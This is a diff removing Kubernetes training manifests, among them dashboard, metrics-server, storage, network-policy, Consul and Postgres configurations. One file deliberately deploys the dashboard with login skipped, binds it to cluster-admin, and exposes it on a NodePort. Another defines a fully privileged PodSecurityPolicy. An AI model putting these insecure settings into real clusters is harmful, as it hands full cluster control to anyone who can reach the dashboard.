k8s-app: kubernetes-dashboard
|
||||
|
||||
---
|
||||
|
||||
apiVersion: v1
|
||||
kind: Secret
|
||||
metadata:
|
||||
labels:
|
||||
k8s-app: kubernetes-dashboard
|
||||
name: kubernetes-dashboard-certs
|
||||
namespace: kubernetes-dashboard
|
||||
type: Opaque
|
||||
|
||||
---
|
||||
|
||||
apiVersion: v1
|
||||
kind: Secret
|
||||
metadata:
|
||||
labels:
|
||||
k8s-app: kubernetes-dashboard
|
||||
name: kubernetes-dashboard-csrf
|
||||
namespace: kubernetes-dashboard
|
||||
type: Opaque
|
||||
data:
|
||||
csrf: ""
|
||||
|
||||
---
|
||||
|
||||
apiVersion: v1
|
||||
kind: Secret
|
||||
metadata:
|
||||
labels:
|
||||
k8s-app: kubernetes-dashboard
|
||||
name: kubernetes-dashboard-key-holder
|
||||
namespace: kubernetes-dashboard
|
||||
type: Opaque
|
||||
|
||||
---
|
||||
|
||||
kind: ConfigMap
|
||||
apiVersion: v1
|
||||
metadata:
|
||||
labels:
|
||||
k8s-app: kubernetes-dashboard
|
||||
name: kubernetes-dashboard-settings
|
||||
namespace: kubernetes-dashboard
|
||||
|
||||
---
|
||||
|
||||
kind: Role
|
||||
apiVersion: rbac.authorization.k8s.io/v1
|
||||
metadata:
|
||||
labels:
|
||||
k8s-app: kubernetes-dashboard
|
||||
name: kubernetes-dashboard
|
||||
namespace: kubernetes-dashboard
|
||||
rules:
|
||||
# Allow Dashboard to get, update and delete Dashboard exclusive secrets.
|
||||
- apiGroups: [""]
|
||||
resources: ["secrets"]
|
||||
resourceNames: ["kubernetes-dashboard-key-holder", "kubernetes-dashboard-certs", "kubernetes-dashboard-csrf"]
|
||||
verbs: ["get", "update", "delete"]
|
||||
# Allow Dashboard to get and update 'kubernetes-dashboard-settings' config map.
|
||||
- apiGroups: [""]
|
||||
resources: ["configmaps"]
|
||||
resourceNames: ["kubernetes-dashboard-settings"]
|
||||
verbs: ["get", "update"]
|
||||
# Allow Dashboard to get metrics.
|
||||
- apiGroups: [""]
|
||||
resources: ["services"]
|
||||
resourceNames: ["heapster", "dashboard-metrics-scraper"]
|
||||
verbs: ["proxy"]
|
||||
- apiGroups: [""]
|
||||
resources: ["services/proxy"]
|
||||
resourceNames: ["heapster", "http:heapster:", "https:heapster:", "dashboard-metrics-scraper", "http:dashboard-metrics-scraper"]
|
||||
verbs: ["get"]
|
||||
|
||||
---
|
||||
|
||||
kind: ClusterRole
|
||||
apiVersion: rbac.authorization.k8s.io/v1
|
||||
metadata:
|
||||
labels:
|
||||
k8s-app: kubernetes-dashboard
|
||||
name: kubernetes-dashboard
|
||||
rules:
|
||||
# Allow Metrics Scraper to get metrics from the Metrics server
|
||||
- apiGroups: ["metrics.k8s.io"]
|
||||
resources: ["pods", "nodes"]
|
||||
verbs: ["get", "list", "watch"]
|
||||
|
||||
---
|
||||
|
||||
apiVersion: rbac.authorization.k8s.io/v1
|
||||
kind: RoleBinding
|
||||
metadata:
|
||||
labels:
|
||||
k8s-app: kubernetes-dashboard
|
||||
name: kubernetes-dashboard
|
||||
namespace: kubernetes-dashboard
|
||||
roleRef:
|
||||
apiGroup: rbac.authorization.k8s.io
|
||||
kind: Role
|
||||
name: kubernetes-dashboard
|
||||
subjects:
|
||||
- kind: ServiceAccount
|
||||
name: kubernetes-dashboard
|
||||
namespace: kubernetes-dashboard
|
||||
|
||||
---
|
||||
|
||||
apiVersion: rbac.authorization.k8s.io/v1
|
||||
kind: ClusterRoleBinding
|
||||
metadata:
|
||||
name: kubernetes-dashboard
|
||||
roleRef:
|
||||
apiGroup: rbac.authorization.k8s.io
|
||||
kind: ClusterRole
|
||||
name: kubernetes-dashboard
|
||||
subjects:
|
||||
- kind: ServiceAccount
|
||||
name: kubernetes-dashboard
|
||||
namespace: kubernetes-dashboard
|
||||
|
||||
---
|
||||
|
||||
kind: Deployment
|
||||
apiVersion: apps/v1
|
||||
metadata:
|
||||
labels:
|
||||
k8s-app: kubernetes-dashboard
|
||||
name: kubernetes-dashboard
|
||||
namespace: kubernetes-dashboard
|
||||
spec:
|
||||
replicas: 1
|
||||
revisionHistoryLimit: 10
|
||||
selector:
|
||||
matchLabels:
|
||||
k8s-app: kubernetes-dashboard
|
||||
template:
|
||||
metadata:
|
||||
labels:
|
||||
k8s-app: kubernetes-dashboard
|
||||
spec:
|
||||
containers:
|
||||
- name: kubernetes-dashboard
|
||||
image: kubernetesui/dashboard:v2.0.0-rc2
|
||||
imagePullPolicy: Always
|
||||
ports:
|
||||
- containerPort: 8443
|
||||
protocol: TCP
|
||||
args:
|
||||
- --auto-generate-certificates
|
||||
- --namespace=kubernetes-dashboard
|
||||
# Uncomment the following line to manually specify Kubernetes API server Host
|
||||
# If not specified, Dashboard will attempt to auto discover the API server and connect
|
||||
# to it. Uncomment only if the default does not work.
|
||||
# - --apiserver-host=http://my-address:port
|
||||
- --enable-skip-login
|
||||
volumeMounts:
|
||||
- name: kubernetes-dashboard-certs
|
||||
mountPath: /certs
|
||||
# Create on-disk volume to store exec logs
|
||||
- mountPath: /tmp
|
||||
name: tmp-volume
|
||||
livenessProbe:
|
||||
httpGet:
|
||||
scheme: HTTPS
|
||||
path: /
|
||||
port: 8443
|
||||
initialDelaySeconds: 30
|
||||
timeoutSeconds: 30
|
||||
securityContext:
|
||||
allowPrivilegeEscalation: false
|
||||
readOnlyRootFilesystem: true
|
||||
runAsUser: 1001
|
||||
runAsGroup: 2001
|
||||
volumes:
|
||||
- name: kubernetes-dashboard-certs
|
||||
secret:
|
||||
secretName: kubernetes-dashboard-certs
|
||||
- name: tmp-volume
|
||||
emptyDir: {}
|
||||
serviceAccountName: kubernetes-dashboard
|
||||
nodeSelector:
|
||||
"beta.kubernetes.io/os": linux
|
||||
# Comment the following tolerations if Dashboard must not be deployed on master
|
||||
tolerations:
|
||||
- key: node-role.kubernetes.io/master
|
||||
effect: NoSchedule
|
||||
|
||||
---
|
||||
|
||||
kind: Service
|
||||
apiVersion: v1
|
||||
metadata:
|
||||
labels:
|
||||
k8s-app: dashboard-metrics-scraper
|
||||
name: dashboard-metrics-scraper
|
||||
namespace: kubernetes-dashboard
|
||||
spec:
|
||||
ports:
|
||||
- port: 8000
|
||||
targetPort: 8000
|
||||
selector:
|
||||
k8s-app: dashboard-metrics-scraper
|
||||
|
||||
---
|
||||
|
||||
kind: Deployment
|
||||
apiVersion: apps/v1
|
||||
metadata:
|
||||
labels:
|
||||
k8s-app: dashboard-metrics-scraper
|
||||
name: dashboard-metrics-scraper
|
||||
namespace: kubernetes-dashboard
|
||||
spec:
|
||||
replicas: 1
|
||||
revisionHistoryLimit: 10
|
||||
selector:
|
||||
matchLabels:
|
||||
k8s-app: dashboard-metrics-scraper
|
||||
template:
|
||||
metadata:
|
||||
labels:
|
||||
k8s-app: dashboard-metrics-scraper
|
||||
annotations:
|
||||
seccomp.security.alpha.kubernetes.io/pod: 'runtime/default'
|
||||
spec:
|
||||
containers:
|
||||
- name: dashboard-metrics-scraper
|
||||
image: kubernetesui/metrics-scraper:v1.0.2
|
||||
ports:
|
||||
- containerPort: 8000
|
||||
protocol: TCP
|
||||
livenessProbe:
|
||||
httpGet:
|
||||
scheme: HTTP
|
||||
path: /
|
||||
port: 8000
|
||||
initialDelaySeconds: 30
|
||||
timeoutSeconds: 30
|
||||
volumeMounts:
|
||||
- mountPath: /tmp
|
||||
name: tmp-volume
|
||||
securityContext:
|
||||
allowPrivilegeEscalation: false
|
||||
readOnlyRootFilesystem: true
|
||||
runAsUser: 1001
|
||||
runAsGroup: 2001
|
||||
serviceAccountName: kubernetes-dashboard
|
||||
nodeSelector:
|
||||
"beta.kubernetes.io/os": linux
|
||||
# Comment the following tolerations if Dashboard must not be deployed on master
|
||||
tolerations:
|
||||
- key: node-role.kubernetes.io/master
|
||||
effect: NoSchedule
|
||||
volumes:
|
||||
- name: tmp-volume
|
||||
emptyDir: {}
|
||||
|
||||
---
|
||||
|
||||
apiVersion: apps/v1
|
||||
kind: Deployment
|
||||
metadata:
|
||||
labels:
|
||||
app: dashboard
|
||||
name: dashboard
|
||||
spec:
|
||||
selector:
|
||||
matchLabels:
|
||||
app: dashboard
|
||||
template:
|
||||
metadata:
|
||||
labels:
|
||||
app: dashboard
|
||||
spec:
|
||||
containers:
|
||||
- args:
|
||||
- sh
|
||||
- -c
|
||||
- apk add --no-cache socat && socat TCP-LISTEN:80,fork,reuseaddr OPENSSL:kubernetes-dashboard.kubernetes-dashboard:443,verify=0
|
||||
image: alpine
|
||||
name: dashboard
|
||||
|
||||
---
|
||||
|
||||
apiVersion: v1
|
||||
kind: Service
|
||||
metadata:
|
||||
labels:
|
||||
app: dashboard
|
||||
name: dashboard
|
||||
spec:
|
||||
ports:
|
||||
- port: 80
|
||||
protocol: TCP
|
||||
targetPort: 80
|
||||
selector:
|
||||
app: dashboard
|
||||
type: NodePort
|
||||
|
||||
---
|
||||
|
||||
apiVersion: rbac.authorization.k8s.io/v1
|
||||
kind: ClusterRoleBinding
|
||||
metadata:
|
||||
name: insecure-dashboard
|
||||
roleRef:
|
||||
apiGroup: rbac.authorization.k8s.io
|
||||
kind: ClusterRole
|
||||
name: cluster-admin
|
||||
subjects:
|
||||
- kind: ServiceAccount
|
||||
name: kubernetes-dashboard
|
||||
namespace: kubernetes-dashboard
|
||||
@@ -1,10 +0,0 @@
|
||||
apiVersion: v1
|
||||
kind: Pod
|
||||
metadata:
|
||||
name: hello
|
||||
namespace: default
|
||||
spec:
|
||||
containers:
|
||||
- name: hello
|
||||
image: nginx
|
||||
|
||||
@@ -1,29 +0,0 @@
|
||||
apiVersion: v1
|
||||
kind: Pod
|
||||
metadata:
|
||||
name: kaniko-build
|
||||
spec:
|
||||
initContainers:
|
||||
- name: git-clone
|
||||
image: alpine
|
||||
command: ["sh", "-c"]
|
||||
args:
|
||||
- |
|
||||
apk add --no-cache git &&
|
||||
git clone git://github.com/jpetazzo/container.training /workspace
|
||||
volumeMounts:
|
||||
- name: workspace
|
||||
mountPath: /workspace
|
||||
containers:
|
||||
- name: build-image
|
||||
image: gcr.io/kaniko-project/executor:latest
|
||||
args:
|
||||
- "--context=/workspace/dockercoins/rng"
|
||||
- "--insecure"
|
||||
- "--destination=registry:5000/rng-kaniko:latest"
|
||||
volumeMounts:
|
||||
- name: workspace
|
||||
mountPath: /workspace
|
||||
volumes:
|
||||
- name: workspace
|
||||
|
||||
@@ -1,162 +0,0 @@
|
||||
# Copyright 2017 The Kubernetes Authors.
|
||||
#
|
||||
# Licensed under the Apache License, Version 2.0 (the "License");
|
||||
# you may not use this file except in compliance with the License.
|
||||
# You may obtain a copy of the License at
|
||||
#
|
||||
# http://www.apache.org/licenses/LICENSE-2.0
|
||||
#
|
||||
# Unless required by applicable law or agreed to in writing, software
|
||||
# distributed under the License is distributed on an "AS IS" BASIS,
|
||||
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
# See the License for the specific language governing permissions and
|
||||
# limitations under the License.
|
||||
|
||||
# ------------------- Dashboard Secret ------------------- #
|
||||
|
||||
apiVersion: v1
|
||||
kind: Secret
|
||||
metadata:
|
||||
labels:
|
||||
k8s-app: kubernetes-dashboard
|
||||
name: kubernetes-dashboard-certs
|
||||
namespace: kube-system
|
||||
type: Opaque
|
||||
|
||||
---
|
||||
# ------------------- Dashboard Service Account ------------------- #
|
||||
|
||||
apiVersion: v1
|
||||
kind: ServiceAccount
|
||||
metadata:
|
||||
labels:
|
||||
k8s-app: kubernetes-dashboard
|
||||
name: kubernetes-dashboard
|
||||
namespace: kube-system
|
||||
|
||||
---
|
||||
# ------------------- Dashboard Role & Role Binding ------------------- #
|
||||
|
||||
kind: Role
|
||||
apiVersion: rbac.authorization.k8s.io/v1
|
||||
metadata:
|
||||
name: kubernetes-dashboard-minimal
|
||||
namespace: kube-system
|
||||
rules:
|
||||
# Allow Dashboard to create 'kubernetes-dashboard-key-holder' secret.
|
||||
- apiGroups: [""]
|
||||
resources: ["secrets"]
|
||||
verbs: ["create"]
|
||||
# Allow Dashboard to create 'kubernetes-dashboard-settings' config map.
|
||||
- apiGroups: [""]
|
||||
resources: ["configmaps"]
|
||||
verbs: ["create"]
|
||||
# Allow Dashboard to get, update and delete Dashboard exclusive secrets.
|
||||
- apiGroups: [""]
|
||||
resources: ["secrets"]
|
||||
resourceNames: ["kubernetes-dashboard-key-holder", "kubernetes-dashboard-certs"]
|
||||
verbs: ["get", "update", "delete"]
|
||||
# Allow Dashboard to get and update 'kubernetes-dashboard-settings' config map.
|
||||
- apiGroups: [""]
|
||||
resources: ["configmaps"]
|
||||
resourceNames: ["kubernetes-dashboard-settings"]
|
||||
verbs: ["get", "update"]
|
||||
# Allow Dashboard to get metrics from heapster.
|
||||
- apiGroups: [""]
|
||||
resources: ["services"]
|
||||
resourceNames: ["heapster"]
|
||||
verbs: ["proxy"]
|
||||
- apiGroups: [""]
|
||||
resources: ["services/proxy"]
|
||||
resourceNames: ["heapster", "http:heapster:", "https:heapster:"]
|
||||
verbs: ["get"]
|
||||
|
||||
---
|
||||
apiVersion: rbac.authorization.k8s.io/v1
|
||||
kind: RoleBinding
|
||||
metadata:
|
||||
name: kubernetes-dashboard-minimal
|
||||
namespace: kube-system
|
||||
roleRef:
|
||||
apiGroup: rbac.authorization.k8s.io
|
||||
kind: Role
|
||||
name: kubernetes-dashboard-minimal
|
||||
subjects:
|
||||
- kind: ServiceAccount
|
||||
name: kubernetes-dashboard
|
||||
namespace: kube-system
|
||||
|
||||
---
|
||||
# ------------------- Dashboard Deployment ------------------- #
|
||||
|
||||
kind: Deployment
|
||||
apiVersion: apps/v1
|
||||
metadata:
|
||||
labels:
|
||||
k8s-app: kubernetes-dashboard
|
||||
name: kubernetes-dashboard
|
||||
namespace: kube-system
|
||||
spec:
|
||||
replicas: 1
|
||||
revisionHistoryLimit: 10
|
||||
selector:
|
||||
matchLabels:
|
||||
k8s-app: kubernetes-dashboard
|
||||
template:
|
||||
metadata:
|
||||
labels:
|
||||
k8s-app: kubernetes-dashboard
|
||||
spec:
|
||||
containers:
|
||||
- name: kubernetes-dashboard
|
||||
image: k8s.gcr.io/kubernetes-dashboard-amd64:v1.10.1
|
||||
ports:
|
||||
- containerPort: 8443
|
||||
protocol: TCP
|
||||
args:
|
||||
- --auto-generate-certificates
|
||||
# Uncomment the following line to manually specify Kubernetes API server Host
|
||||
# If not specified, Dashboard will attempt to auto discover the API server and connect
|
||||
# to it. Uncomment only if the default does not work.
|
||||
# - --apiserver-host=http://my-address:port
|
||||
volumeMounts:
|
||||
- name: kubernetes-dashboard-certs
|
||||
mountPath: /certs
|
||||
# Create on-disk volume to store exec logs
|
||||
- mountPath: /tmp
|
||||
name: tmp-volume
|
||||
livenessProbe:
|
||||
httpGet:
|
||||
scheme: HTTPS
|
||||
path: /
|
||||
port: 8443
|
||||
initialDelaySeconds: 30
|
||||
timeoutSeconds: 30
|
||||
volumes:
|
||||
- name: kubernetes-dashboard-certs
|
||||
secret:
|
||||
secretName: kubernetes-dashboard-certs
|
||||
- name: tmp-volume
|
||||
emptyDir: {}
|
||||
serviceAccountName: kubernetes-dashboard
|
||||
# Comment the following tolerations if Dashboard must not be deployed on master
|
||||
tolerations:
|
||||
- key: node-role.kubernetes.io/master
|
||||
effect: NoSchedule
|
||||
|
||||
---
|
||||
# ------------------- Dashboard Service ------------------- #
|
||||
|
||||
kind: Service
|
||||
apiVersion: v1
|
||||
metadata:
|
||||
labels:
|
||||
k8s-app: kubernetes-dashboard
|
||||
name: kubernetes-dashboard
|
||||
namespace: kube-system
|
||||
spec:
|
||||
ports:
|
||||
- port: 443
|
||||
targetPort: 8443
|
||||
selector:
|
||||
k8s-app: kubernetes-dashboard
|
||||
@@ -1,110 +0,0 @@
# This is a local copy of:
# https://github.com/rancher/local-path-provisioner/blob/master/deploy/local-path-storage.yaml
---
apiVersion: v1
kind: Namespace
metadata:
  name: local-path-storage
---
apiVersion: v1
kind: ServiceAccount
metadata:
  name: local-path-provisioner-service-account
  namespace: local-path-storage
---
apiVersion: rbac.authorization.k8s.io/v1beta1
kind: ClusterRole
metadata:
  name: local-path-provisioner-role
  namespace: local-path-storage
rules:
- apiGroups: [""]
  resources: ["nodes", "persistentvolumeclaims"]
  verbs: ["get", "list", "watch"]
- apiGroups: [""]
  resources: ["endpoints", "persistentvolumes", "pods"]
  verbs: ["*"]
- apiGroups: [""]
  resources: ["events"]
  verbs: ["create", "patch"]
- apiGroups: ["storage.k8s.io"]
  resources: ["storageclasses"]
  verbs: ["get", "list", "watch"]
---
apiVersion: rbac.authorization.k8s.io/v1beta1
kind: ClusterRoleBinding
metadata:
  name: local-path-provisioner-bind
  namespace: local-path-storage
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: ClusterRole
  name: local-path-provisioner-role
subjects:
- kind: ServiceAccount
  name: local-path-provisioner-service-account
  namespace: local-path-storage
---
apiVersion: apps/v1
kind: Deployment
metadata:
  name: local-path-provisioner
  namespace: local-path-storage
spec:
  replicas: 1
  selector:
    matchLabels:
      app: local-path-provisioner
  template:
    metadata:
      labels:
        app: local-path-provisioner
    spec:
      serviceAccountName: local-path-provisioner-service-account
      containers:
      - name: local-path-provisioner
        image: rancher/local-path-provisioner:v0.0.8
        imagePullPolicy: Always
        command:
        - local-path-provisioner
        - --debug
        - start
        - --config
        - /etc/config/config.json
        volumeMounts:
        - name: config-volume
          mountPath: /etc/config/
        env:
        - name: POD_NAMESPACE
          valueFrom:
            fieldRef:
              fieldPath: metadata.namespace
      volumes:
      - name: config-volume
        configMap:
          name: local-path-config
---
apiVersion: storage.k8s.io/v1
kind: StorageClass
metadata:
  name: local-path
provisioner: rancher.io/local-path
volumeBindingMode: WaitForFirstConsumer
reclaimPolicy: Delete
---
kind: ConfigMap
apiVersion: v1
metadata:
  name: local-path-config
  namespace: local-path-storage
data:
  config.json: |-
    {
      "nodePathMap":[
        {
          "node":"DEFAULT_PATH_FOR_NON_LISTED_NODES",
          "paths":["/opt/local-path-provisioner"]
        }
      ]
    }
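
With volumeBindingMode: WaitForFirstConsumer, a claim against this class stays Pending until a pod actually mounts it, so the provisioner can create the volume on the node where that pod is scheduled. A minimal sketch of such a claim (the name my-local-claim is made up for illustration):

# Illustrative only: a claim using the local-path class defined above.
apiVersion: v1
kind: PersistentVolumeClaim
metadata:
  name: my-local-claim
spec:
  storageClassName: local-path
  accessModes:
  - ReadWriteOnce
  resources:
    requests:
      storage: 1Gi
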
@@ -1,138 +0,0 @@
kind: ClusterRole
apiVersion: rbac.authorization.k8s.io/v1
metadata:
  name: system:aggregated-metrics-reader
  labels:
    rbac.authorization.k8s.io/aggregate-to-view: "true"
    rbac.authorization.k8s.io/aggregate-to-edit: "true"
    rbac.authorization.k8s.io/aggregate-to-admin: "true"
rules:
- apiGroups: ["metrics.k8s.io"]
  resources: ["pods"]
  verbs: ["get", "list", "watch"]
---
apiVersion: rbac.authorization.k8s.io/v1beta1
kind: ClusterRoleBinding
metadata:
  name: metrics-server:system:auth-delegator
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: ClusterRole
  name: system:auth-delegator
subjects:
- kind: ServiceAccount
  name: metrics-server
  namespace: kube-system
---
apiVersion: rbac.authorization.k8s.io/v1beta1
kind: RoleBinding
metadata:
  name: metrics-server-auth-reader
  namespace: kube-system
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: Role
  name: extension-apiserver-authentication-reader
subjects:
- kind: ServiceAccount
  name: metrics-server
  namespace: kube-system
---
apiVersion: apiregistration.k8s.io/v1beta1
kind: APIService
metadata:
  name: v1beta1.metrics.k8s.io
spec:
  service:
    name: metrics-server
    namespace: kube-system
  group: metrics.k8s.io
  version: v1beta1
  insecureSkipTLSVerify: true
  groupPriorityMinimum: 100
  versionPriority: 100
---
apiVersion: v1
kind: ServiceAccount
metadata:
  name: metrics-server
  namespace: kube-system
---
apiVersion: apps/v1
kind: Deployment
metadata:
  name: metrics-server
  namespace: kube-system
  labels:
    k8s-app: metrics-server
spec:
  selector:
    matchLabels:
      k8s-app: metrics-server
  template:
    metadata:
      name: metrics-server
      labels:
        k8s-app: metrics-server
    spec:
      serviceAccountName: metrics-server
      volumes:
      # mount in tmp so we can safely use from-scratch images and/or read-only containers
      - name: tmp-dir
        emptyDir: {}
      containers:
      - name: metrics-server
        image: k8s.gcr.io/metrics-server-amd64:v0.3.3
        imagePullPolicy: Always
        volumeMounts:
        - name: tmp-dir
          mountPath: /tmp
        args:
        - --kubelet-preferred-address-types=InternalIP
        - --kubelet-insecure-tls
        - --metric-resolution=5s

---
apiVersion: v1
kind: Service
metadata:
  name: metrics-server
  namespace: kube-system
  labels:
    kubernetes.io/name: "Metrics-server"
spec:
  selector:
    k8s-app: metrics-server
  ports:
  - port: 443
    protocol: TCP
    targetPort: 443
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
  name: system:metrics-server
rules:
- apiGroups:
  - ""
  resources:
  - pods
  - nodes
  - nodes/stats
  verbs:
  - get
  - list
  - watch
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
  name: system:metrics-server
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: ClusterRole
  name: system:metrics-server
subjects:
- kind: ServiceAccount
  name: metrics-server
  namespace: kube-system
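
Once the APIService above is registered, the metrics.k8s.io group backs kubectl top and the HorizontalPodAutoscaler. A sketch of one typical consumer of this API, assuming a hypothetical Deployment named web:

# Illustrative only: an autoscaler consuming the Metrics API;
# the target Deployment "web" is hypothetical.
apiVersion: autoscaling/v2beta2
kind: HorizontalPodAutoscaler
metadata:
  name: web
spec:
  scaleTargetRef:
    apiVersion: apps/v1
    kind: Deployment
    name: web
  minReplicas: 1
  maxReplicas: 10
  metrics:
  - type: Resource
    resource:
      name: cpu
      target:
        type: Utilization
        averageUtilization: 50
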
@@ -1,14 +0,0 @@
kind: NetworkPolicy
apiVersion: networking.k8s.io/v1
metadata:
  name: allow-testcurl-for-testweb
spec:
  podSelector:
    matchLabels:
      app: testweb
  ingress:
  - from:
    - podSelector:
        matchLabels:
          run: testcurl
@@ -1,10 +0,0 @@
kind: NetworkPolicy
apiVersion: networking.k8s.io/v1
metadata:
  name: deny-all-for-testweb
spec:
  podSelector:
    matchLabels:
      app: testweb
  ingress: []
@@ -1,22 +0,0 @@
kind: NetworkPolicy
apiVersion: networking.k8s.io/v1
metadata:
  name: deny-from-other-namespaces
spec:
  podSelector:
    matchLabels:
  ingress:
  - from:
    - podSelector: {}
---
kind: NetworkPolicy
apiVersion: networking.k8s.io/v1
metadata:
  name: allow-webui
spec:
  podSelector:
    matchLabels:
      app: webui
  ingress:
  - from: []
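
These policies select pods labeled app=testweb and admit traffic from pods labeled run=testcurl, but neither workload is defined in this repo's manifests. A sketch of pods carrying those labels, for exercising the rules (pod names and images are placeholders):

# Illustrative only: minimal pods matching the selectors above.
apiVersion: v1
kind: Pod
metadata:
  name: testweb
  labels:
    app: testweb
spec:
  containers:
  - name: nginx
    image: nginx
---
apiVersion: v1
kind: Pod
metadata:
  name: testcurl
  labels:
    run: testcurl
spec:
  containers:
  - name: curl
    image: curlimages/curl
    command: ["sleep", "3600"]
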
@@ -1,8 +0,0 @@
apiVersion: v1
kind: Pod
metadata:
  name: nginx-without-volume
spec:
  containers:
  - name: nginx
    image: nginx
@@ -1,13 +0,0 @@
apiVersion: v1
kind: Pod
metadata:
  name: nginx-with-volume
spec:
  volumes:
  - name: www
  containers:
  - name: nginx
    image: nginx
    volumeMounts:
    - name: www
      mountPath: /usr/share/nginx/html/
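
A volume declared with only a name, as above, is defaulted by the API server to an emptyDir. The same fragment of the pod spec with the default spelled out:

  volumes:
  - name: www
    emptyDir: {}   # what Kubernetes assumes when no volume type is given
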
@@ -1,21 +0,0 @@
apiVersion: v1
kind: Pod
metadata:
  name: nginx-with-git
spec:
  volumes:
  - name: www
  containers:
  - name: nginx
    image: nginx
    volumeMounts:
    - name: www
      mountPath: /usr/share/nginx/html/
  - name: git
    image: alpine
    command: [ "sh", "-c", "apk add git && git clone https://github.com/octocat/Spoon-Knife /www" ]
    volumeMounts:
    - name: www
      mountPath: /www/
  restartPolicy: OnFailure
@@ -1,20 +0,0 @@
apiVersion: v1
kind: Pod
metadata:
  name: nginx-with-init
spec:
  volumes:
  - name: www
  containers:
  - name: nginx
    image: nginx
    volumeMounts:
    - name: www
      mountPath: /usr/share/nginx/html/
  initContainers:
  - name: git
    image: alpine
    command: [ "sh", "-c", "apk add --no-cache git && git clone https://github.com/octocat/Spoon-Knife /www" ]
    volumeMounts:
    - name: www
      mountPath: /www/
@@ -1,98 +0,0 @@
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
  name: persistentconsul
rules:
- apiGroups: [""]
  resources:
  - pods
  verbs:
  - get
  - list
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
  name: persistentconsul
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: ClusterRole
  name: persistentconsul
subjects:
- kind: ServiceAccount
  name: persistentconsul
  namespace: default
---
apiVersion: v1
kind: ServiceAccount
metadata:
  name: persistentconsul
---
apiVersion: v1
kind: Service
metadata:
  name: persistentconsul
spec:
  ports:
  - port: 8500
    name: http
  selector:
    app: persistentconsul
---
apiVersion: apps/v1
kind: StatefulSet
metadata:
  name: persistentconsul
spec:
  serviceName: persistentconsul
  replicas: 3
  selector:
    matchLabels:
      app: persistentconsul
  volumeClaimTemplates:
  - metadata:
      name: data
    spec:
      accessModes:
      - ReadWriteOnce
      resources:
        requests:
          storage: 1Gi
  template:
    metadata:
      labels:
        app: persistentconsul
    spec:
      serviceAccountName: persistentconsul
      affinity:
        podAntiAffinity:
          requiredDuringSchedulingIgnoredDuringExecution:
          - labelSelector:
              matchExpressions:
              - key: app
                operator: In
                values:
                - persistentconsul
            topologyKey: kubernetes.io/hostname
      terminationGracePeriodSeconds: 10
      containers:
      - name: consul
        image: "consul:1.6"
        volumeMounts:
        - name: data
          mountPath: /consul/data
        args:
        - "agent"
        - "-bootstrap-expect=3"
        - "-retry-join=provider=k8s label_selector=\"app=persistentconsul\""
        - "-client=0.0.0.0"
        - "-data-dir=/consul/data"
        - "-server"
        - "-ui"
        lifecycle:
          preStop:
            exec:
              command:
              - /bin/sh
              - -c
              - consul leave
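
For each replica, the StatefulSet controller instantiates the volumeClaimTemplates entry as a PVC named <template>-<statefulset>-<ordinal>, and that claim survives pod rescheduling. Roughly what gets created for replica 0 (a sketch, not part of this file):

# Illustrative only: approximately the claim the controller creates
# for replica 0 from the template above.
apiVersion: v1
kind: PersistentVolumeClaim
metadata:
  name: data-persistentconsul-0
spec:
  accessModes:
  - ReadWriteOnce
  resources:
    requests:
      storage: 1Gi
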
1116
k8s/portworx.yaml
@@ -1,37 +0,0 @@
apiVersion: apps/v1
kind: StatefulSet
metadata:
  name: postgres
spec:
  selector:
    matchLabels:
      app: postgres
  serviceName: postgres
  template:
    metadata:
      labels:
        app: postgres
    spec:
      #schedulerName: stork
      initContainers:
      - name: rmdir
        image: alpine
        volumeMounts:
        - mountPath: /vol
          name: postgres
        command: ["sh", "-c", "if [ -d /vol/lost+found ]; then rmdir /vol/lost+found; fi"]
      containers:
      - name: postgres
        image: postgres:11
        volumeMounts:
        - mountPath: /var/lib/postgresql/data
          name: postgres
  volumeClaimTemplates:
  - metadata:
      name: postgres
    spec:
      accessModes: ["ReadWriteOnce"]
      resources:
        requests:
          storage: 1Gi
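
serviceName: postgres points at a governing Service that this file does not define, so it has to be created elsewhere. A sketch of the headless definition such a StatefulSet typically implies (an assumption, not part of this diff):

# Illustrative only: a headless Service matching serviceName above.
apiVersion: v1
kind: Service
metadata:
  name: postgres
spec:
  clusterIP: None
  selector:
    app: postgres
  ports:
  - port: 5432
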
@@ -1,39 +0,0 @@
---
apiVersion: policy/v1beta1
kind: PodSecurityPolicy
metadata:
  name: privileged
  annotations:
    seccomp.security.alpha.kubernetes.io/allowedProfileNames: '*'
spec:
  privileged: true
  allowPrivilegeEscalation: true
  allowedCapabilities:
  - '*'
  volumes:
  - '*'
  hostNetwork: true
  hostPorts:
  - min: 0
    max: 65535
  hostIPC: true
  hostPID: true
  runAsUser:
    rule: 'RunAsAny'
  seLinux:
    rule: 'RunAsAny'
  supplementalGroups:
    rule: 'RunAsAny'
  fsGroup:
    rule: 'RunAsAny'
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
  name: psp:privileged
rules:
- apiGroups: ['policy']
  resources: ['podsecuritypolicies']
  verbs: ['use']
  resourceNames: ['privileged']
